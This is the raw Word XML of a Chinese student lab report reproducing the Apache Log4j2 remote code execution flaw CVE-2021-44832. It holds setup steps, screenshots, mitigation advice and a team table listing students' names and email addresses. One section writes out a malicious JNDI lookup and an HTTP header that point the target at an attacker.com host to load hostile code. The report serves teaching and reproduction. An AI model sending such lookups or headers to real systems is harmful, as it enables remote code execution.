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391BF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288F6175">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F065DE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570405DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18376C38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 w14:paraId="7BA57B81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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118EC529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 w14:paraId="75DFD47D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A12F7B">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764A429D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6AE35E">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9172AD">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F8121D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7EFFB8">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01781EC7">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F73070D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C177FFD">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2350CC89">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C818BE">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF8DBEE"/>
    <w:p w14:paraId="799F53EB"/>
    <w:p w14:paraId="071ABB55">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3848F78D">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F636118">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B172F44">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B9286B">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7C6401"/>
    <w:p w14:paraId="3E5452B5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4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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131BA94"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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0F662A69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4F0BD3F2">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="major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hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc28487 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36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结论（</w:t>
          </w:r>
          <w:r>
            <w:t>1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_Toc28487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ajorEastAsia"/>
              <w:bCs/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0FAF7CB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_Toc7481 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>1.1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>风险等级分布</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7481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8C95B2E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计划（25分）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897FC62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_Toc13939 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.1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_Toc13939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D5010A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_Toc3137 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.2</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞</w:t>
          </w:r>
          <w:r>
            <w:rPr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A5794C2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_Toc7909 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>2.3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阶段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515369E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2.4风险等级</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1860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83FD6E6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过程（</w:t>
          </w:r>
          <w:r>
            <w:t>3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_Toc6133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BD61BA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风险管理及规避</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18532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0D7202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4EE8C88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3</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>测试中所用的工具</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28445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1FBAA0F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结果（25分）</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12892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C41C3F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_Toc32666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 POC插件编写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9F146F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4.2 漏洞信息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520C27A">
          <w:pPr>
            <w:bidi w:val="0"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6E9FD3EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1670BAB5"/>
    <w:p w14:paraId="47EFF5A2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/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BC9B835">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="1" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.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5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7F83C740"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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>南开大学15小组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的漏洞复现步骤于2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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至2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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Apache Log4j2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4E39D">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts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个。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 w14:paraId="29797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 w14:paraId="0997372A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" w:name="_Hlk482954515"/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54A628BD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49EE92C3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 w14:paraId="23603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95" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2197E4D7">
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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14" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1999882D">
            <w:pPr>
              <w:spacing w:after="156"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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Apache Log4j2 远程代码执行漏洞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CVE-2021-44832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13" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68B5ED56">
            <w:pPr>
              <w:spacing w:after="156"/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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p w14:paraId="146B2705">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc7481"/>
      <w:bookmarkStart w:id="6" w:name="_Toc5011"/>
    </w:p>
    <w:p w14:paraId="0A06E877">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr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389D86C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C272286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高危</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF17D41">
      <w:pPr>
        <w:pStyle w:val="3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计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="671DEF5E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc13939"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc21093"/>
      <w:r>
        <w:t>2.1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人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="81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 w14:paraId="56D38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0D627E5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06F8FED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672358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45B8EC2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14:paraId="6A52E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DAC09F9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F3161E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9EEE1B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常欣然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ADF6B6F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1195108945@qq.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E8A9A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6BE5B3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20012E05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C1B372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高玉格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5E0F1F1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1463948484@qq.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="022BC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2ADA89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7BF6753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40D72D6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马浩博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ED33CF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1191173636@qq.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A54F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AC52F2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D79D1C1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B97B19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宋常秀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9D27CB3">
            <w:pPr>
              <w:widowControl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3281405348@qq.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53948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077A5EB"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E9805BB"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91345E3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曹瑜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A95DA33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463246828@qq.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21FA1B65">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc3137"/>
      <w:bookmarkStart w:id="14" w:name="_Toc19764"/>
      <w:bookmarkStart w:id="15" w:name="_Toc18367"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0140BC67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Apache Log4j22.0-beta9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~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.17.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98B7A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc33"/>
      <w:r>
        <w:t>2.3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阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341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376"/>
      </w:tblGrid>
      <w:tr w14:paraId="1D40D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3" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EDD6B81">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="48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14EFEB34">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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14:paraId="7A8B3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 w14:paraId="1A402274">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto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下载环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F52956">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:jc w:val="center"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US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下载复现环境以及工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E24A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 w14:paraId="36636927">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto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配置环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B8271E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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修改相关配置文件，例如xml文件，相关url链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13972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343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EF06EA6">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto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启动环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F54CB69">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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运行相关工具以及漏洞环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2663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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BEB181E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto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漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F0FEBA">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="auto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对漏洞进行攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="108D00C8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860"/>
    </w:p>
    <w:p w14:paraId="5741DDA9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="8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651"/>
        <w:gridCol w:w="5721"/>
      </w:tblGrid>
      <w:tr w14:paraId="66550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1F4650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19C4146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28E13A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14:paraId="73AD2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29D45C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5A1FC3EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D52AE37">
            <w:pPr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通过此漏洞攻击者可以远程执行任意命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="124FFA8B">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE354D0"/>
    <w:p w14:paraId="2715B7AC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="23" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.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5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="46C00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靶机：kali192.168.200.12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384202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docker-compose up –d #启动服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DA419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011045"/>
            <wp:effectExtent l="0" t="0" r="1905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375C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule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开启http服务，在config目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920082A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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186555" cy="38163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6BFB">
      <w:pPr>
        <w:pStyle w:val="2"/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运行利用工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE62063">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4796790" cy="153606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6E06">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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修改config/log4j2.xml中的DataSource部分为生成的jndi地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D322429">
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC8ADC6">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4836160" cy="2284095"/>
            <wp:effectExtent l="0" t="0" r="254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EF9D">
      <w:pPr>
        <w:pStyle w:val="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修改test。java文件中的url地址为http服务地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5AAF2">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2648585"/>
            <wp:effectExtent l="0" t="0" r="1016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AEF4">
      <w:pPr>
        <w:pStyle w:val="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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8AC22">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="4010660"/>
            <wp:effectExtent l="0" t="0" r="1333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C6C7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复现成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642EE5A2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="60648746">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc4033"/>
      <w:bookmarkStart w:id="27" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="28" w:name="_Toc10352"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>更新 Log4j2 至最新版本，禁用 JNDI 查找功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D76275">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="15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6DC6F5E0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29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc28030"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17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确认目标系统使用 Log4j2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：检查目标应用的版本和配置文件是否使用 Log4j2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5847EE30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17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准备恶意配置文件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：创建一个 Log4j2 配置文件（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log4j2.xml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），包含恶意 JNDI 查找，如 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ldap://attacker.com:1389/Exploit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。在服务器上托管这个配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76813AA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17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发送测试请求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：向目标系统发送一个 HTTP 请求，包含头部 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X-Log4j-Config: http://attacker.com:8080/log4j2.xml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。确保目标系统会从指定的 URL 加载配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE93E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17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验证结果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：监控服务器是否接收到来自目标系统的请求，检查目标系统是否执行了恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50403BF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00BF34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Kali / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ubuntu20.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF73BA3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
